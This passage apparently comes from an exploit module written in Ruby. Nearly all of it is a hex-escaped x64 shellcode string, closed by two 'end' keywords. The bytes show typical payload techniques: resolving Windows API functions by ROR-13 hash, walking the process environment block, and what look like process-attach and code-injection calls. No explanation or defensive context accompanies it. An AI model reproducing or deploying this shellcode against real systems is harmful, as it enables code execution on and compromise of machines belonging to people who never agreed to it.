    "\xD1\x41\xBB\x4B\xCA\x0A\xEE\x48\x83\xEC\x20\xE8\x52\x01\x00\x00" +
    "\x85\xC0\x0F\x85\xC8\x00\x00\x00\x49\x8B\x3E\x48\x8D\x35\xE9\x00" +
    "\x00\x00\x31\xC9\x66\x03\x0D\xD7\x01\x00\x00\x66\x81\xC1\xF9\x00" +
    "\xF3\xA4\x48\x89\xDE\x48\x81\xC6\x08\x03\x00\x00\x48\x89\xF1\x48" +
    "\x8B\x11\x4C\x29\xE2\x51\x52\x48\x89\xD1\x48\x83\xEC\x20\x41\xBB" +
    "\x26\x40\x36\x9D\xE8\x09\x01\x00\x00\x48\x83\xC4\x20\x5A\x59\x48" +
    "\x85\xC0\x74\x18\x48\x8B\x80\xC8\x02\x00\x00\x48\x85\xC0\x74\x0C" +
    "\x48\x83\xC2\x4C\x8B\x02\x0F\xBA\xE0\x05\x72\x05\x48\x8B\x09\xEB" +
    "\xBE\x48\x83\xEA\x4C\x49\x89\xD4\x31\xD2\x80\xC2\x90\x31\xC9\x41" +
    "\xBB\x26\xAC\x50\x91\xE8\xC8\x00\x00\x00\x48\x89\xC1\x4C\x8D\x89" +
    "\x80\x00\x00\x00\x41\xC6\x01\xC3\x4C\x89\xE2\x49\x89\xC4\x4D\x31" +
    "\xC0\x41\x50\x6A\x01\x49\x8B\x06\x50\x41\x50\x48\x83\xEC\x20\x41" +
    "\xBB\xAC\xCE\x55\x4B\xE8\x98\x00\x00\x00\x31\xD2\x52\x52\x41\x58" +
    "\x41\x59\x4C\x89\xE1\x41\xBB\x18\x38\x09\x9E\xE8\x82\x00\x00\x00" +
    "\x4C\x89\xE9\x41\xBB\x22\xB7\xB3\x7D\xE8\x74\x00\x00\x00\x48\x89" +
    "\xD9\x41\xBB\x0D\xE2\x4D\x85\xE8\x66\x00\x00\x00\x48\x89\xEC\x5D" +
    "\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x5E\xC3\xE9\xB5\x00\x00\x00" +
    "\x4D\x31\xC9\x31\xC0\xAC\x41\xC1\xC9\x0D\x3C\x61\x7C\x02\x2C\x20" +
    "\x41\x01\xC1\x38\xE0\x75\xEC\xC3\x31\xD2\x65\x48\x8B\x52\x60\x48" +
    "\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x12\x48\x8B\x72\x50\x48\x0F" +
    "\xB7\x4A\x4A\x45\x31\xC9\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41" +
    "\xC1\xC9\x0D\x41\x01\xC1\xE2\xEE\x45\x39\xD9\x75\xDA\x4C\x8B\x7A" +
    "\x20\xC3\x4C\x89\xF8\x41\x51\x41\x50\x52\x51\x56\x48\x89\xC2\x8B" +
    "\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00\x00\x48\x01\xD0\x50\x8B" +
    "\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\x48\xFF\xC9\x41\x8B\x34\x88" +
    "\x48\x01\xD6\xE8\x78\xFF\xFF\xFF\x45\x39\xD9\x75\xEC\x58\x44\x8B" +
    "\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01" +
    "\xD0\x41\x8B\x04\x88\x48\x01\xD0\x5E\x59\x5A\x41\x58\x41\x59\x41" +
    "\x5B\x41\x53\xFF\xE0\x56\x41\x57\x55\x48\x89\xE5\x48\x83\xEC\x20" +
    "\x41\xBB\xDA\x16\xAF\x92\xE8\x4D\xFF\xFF\xFF\x31\xC9\x51\x51\x51" +
    "\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00\x5A\x48\x83\xEC\x20\x41" +
    "\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF\x48\x89\xEC\x5D\x41\x5F" +
    "\x5E\xC3"
  end

end